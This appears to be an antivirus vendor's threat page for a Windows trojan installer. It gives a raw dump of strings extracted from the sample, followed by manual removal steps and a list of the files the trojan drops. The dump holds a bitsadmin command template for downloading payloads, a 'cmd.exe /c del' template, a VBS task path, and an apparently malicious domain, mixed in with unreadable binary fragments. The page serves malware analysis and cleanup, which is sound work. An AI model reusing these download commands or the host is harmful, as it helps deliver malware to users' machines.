123 121 2 27 65 24 88 120 34

123 121 2 27 65 24 88 120 52

89 98 7 19 100 85 83 122 15

89 101 15 16 103 16 66 102

88 122 6 76 58 85 83 122 15

101 115 2 27 78 18 91 115

101 115 15 26 105 8 82 82 32

68 100 21

96 100 10 11 109 61 94 122 6

64 100 8 12 124

KERNEL32.dll

GetProcessHeap

GetCPInfo

zcÁ

.sYPELN

.Hfs-

%\sA.br

sG%F`l

k.gJw

H%UtC

pz.rSDz

#.mlz

j%u5Q

dO~.gnM

.Ng)Gy:o

PX'.RS>

A!N%d)

YSshqh

2.PAP

al0f

%fTeN

7*1%x

XG.bK

.Ap 6

.uE=z)

y%xv/

?b.hUuF3

.SRR*

%UT o

.PdbRH

hFAÒJ

.wrCc

TV%%Ux

4..Sp

J[%Um

.Vj3b

>.QXlQ

^P.em

.pfm(

}V%%U

^kG%D

HHB.HHB.

<assemblyIdentity type="win32" processorArchitecture="*" version="3.0.15.2" name="Name"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

1-2

6l6P6A<v<

11F1X1d1q1

1 141:1\1

2'252?2[2`2

> ?7?@?|?

8&9-949@9

9(9,989@9\9|9

Cmscoree.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

kernel32.dll

ADVAPI32.DLL

USER32.DLL

portuguese-brazilian

109 90 121

103 67 12

122 93 120

126 74 111 105 70 68 104

16 103 70 92 111 97 67 113

126 106 79 73 70 100 72

125 82 105 105

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe

3.21.12.38

bor.exe

Setup__2140_il65.exe_1408_rwx_02480000_000B3000:

.text

`.rdata

@.data

.rsrc

@.reloc

j5SSh

8%uEP3

xSSSh

FTPjKS

FtPj;S

C.PjRV

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

GetProcessWindowStation

WinHttpSetStatusCallback

t/lURlhE7oHSekJAUfGI1XZRfHbqjOY=

Failed to get the Temp folder: %d

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

sNRhTgJj9pbUckcMdOyB0GdGSDe7gLs=

CInstallationManager::IsPartOfInstallation value=%s

CInstallationManager::SetComponentInstallationEnded %S

%Y-%m-%d %H:%M:%S

CProgressUpdateRequest::CreateInstance %S

CProgressUpdateRequest::ProgressUpdate %S

Send progress update request %s

Progress Request for '%S' return %s

t/lURlhH/5DZVVFDeteg/XpQWEA=

q8F2TXxl8YfUYFAARuuBw2plWXvytMN8QElk7a3cckRJWf J1EQPb2X7hcV2d0N48ozUf1MfJc2K0GNQRHjqyOFhTE9y7ZeCIW1Jb qznUNRQ3T7l8IgEWp 7JfFRA9veO6d93pPSUCyoNR/Rlhy2I3ddnQAWvGS1FVKQHLJyPJhRk1j 7DZYUZNc7Kj1Gd1SWXtjd59ZlRAsrfUZ2ZCYfeW3n1OSXnqstBhSk118oHmP2RJY8qB3GNzTWP2s51ESkhy3YzQYXdDWuuIxXphVWP7yPZ2V2F4 pHddmVFe/uq0H5GezvZgcVGUEll2oHXclZAY8ut/XJNS2L/g9Q/YF5y/5DUV0pecv2Q3mFaezvZgcVVSkBy35DFYUpOYuqBwkQPf3Lqoth/Rm1j6pbYcVZYcu2znURCRWPYi8NeVkBj95TddmxOffuHxWAPb3vxl9RbQkJz8oGdUFFJduqB9GVGQmPJyOJ2V2lh 4rFP3FJZPuQ9GVGQmOys9B6V2p47LfYfURActGG23ZAWDvMgd12Ql9y05HFdlsAWO6B30NRQ3T7l8I/YF5y/5DUXlZYcuaznVRGWEP7icFVSkBy0IXcdnQAUPKL03JPamX7gZ1URlhb/5fFVlFeeOzI9nZXaW/3kPJ8R0lH7IvSdlBfO9GRxWNWWFP7hsR0cFhl94rWUg9pb 6F33dmQmH3lt59Tkl56rfFYUpCcO2znVBRSXbqgfd6T0lA

%c%c%c%c

VERSION.dll

KERNEL32.dll

USER32.dll

GDI32.dll

RegDeleteKeyW

RegCloseKey

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

Secur32.dll

WinHttpCloseHandle

WinHttpOpen

WinHttpSetOption

WinHttpGetProxyForUrl

WinHttpCrackUrl

WinHttpConnect

WinHttpOpenRequest

WinHttpSetStatusCallback

WinHttpSendRequest

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpReceiveResponse

WINHTTP.dll

GetProcessHeap

GetCPInfo

zcÁ

.?AVAsyncWinHttp@@

.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AUISupportErrorInfo@@

.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@

?456789:;<=

!"#$%&'()* ,-./0123

carpel.groveled.1 = s 'Inst Class'

CLSID = s '{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}'

carpel.groveled = s 'Inst Class'

CurVer = s 'carpel.groveled.1'

ForceRemove {320195d8-a8c1-4b82-b50e-6e2fe7b25b99} = s 'Inst Class'

ProgID = s 'carpel.groveled.1'

VersionIndependentProgID = s 'carpel.groveled'

val ServerExecutable = s '%MODULE_RAW%'

TypeLib = s '{b5becdeb-e2ba-4f85-ae0b-37cb4d093da2}'

.sssh

REÚ

\.crr

s1f-'

.DC l

tweb

<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

stdole2.tlbWWW(

msgWd

keyNameW

urlW

url2d

YtcmdLineW

P%CreateIconWW

iconUrlW

regKeyWW

CheckRegKeyW

keyWd

W.launchCommandLineWWW

~cmdW

WDIsShortNameInstalledd

Created by MIDL version 7.00.0555 at Thu May 12 17:02:02 2016

7%8x8

8%8S8r8x8

1 2$2(2,2

<#<(<3<9<

3$3(3,3034383<3@3

4(4/44484<4]4

4&5,5054585

00f0v0

0
0|0

1 1$1(1,1014181<1

004080<0

4 4@4`4|4

: :<:@:`:

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

wKERNEL32.DLL

ADVAPI32.DLL

WUSER32.DLL

Winhttp.dll

shlwapi.dll

HKEY_CURRENT_CONFIG

HKEY_DYN_DATA

HKEY_PERFORMANCE_DATA

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

appimageurl

cmdl

capp=%s&cid=%s&mhx=%S&base=%s

\bitsadmin.exe

\Support Tools\bitsadmin.exe

:?*\"'/.

dream.capture

%sami%s%d%d.exe

%d-%.2d-%.2dT%.2d:%.2d:00

%d-%.2d-%.2dT%.2d:-:00

/retrynav %d

Advapi32.dll

shell32.dll

{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}

OLEAUT32.DLL

kernel32.dll

sn=%s&hx=%S&base=%s

rfsw%d

advapi32.dll

v2.0.50727

v1.1.4322

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

%ProgramFiles%\Microsoft Silverlight\sllauncher.exe

%ProgramW6432%\Microsoft Silverlight\sllauncher.exe

NT%d.%dSP%d

%d.%d.%d.%d

ami%sExd

bitsadmin /transfer amijob /download /priority high %s %s

ami%sExi

/c del "%s"

cmd.exe

%TEMP%\task.vbs

ami%sExdel

%%X

version.dll

OleAut32.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

1.1.5.26

setup.exe

secularistsarakolet.site

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:1764
cpSetup.exe:260
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (31319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe (66356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (1709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (7648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dm_left_image[1].png (3108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\logo[1].png (3036 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (31329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\accept[1].gif (3 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.Generic.11944172_e024fb5336

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.Generic.11944172_e024fb5336

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet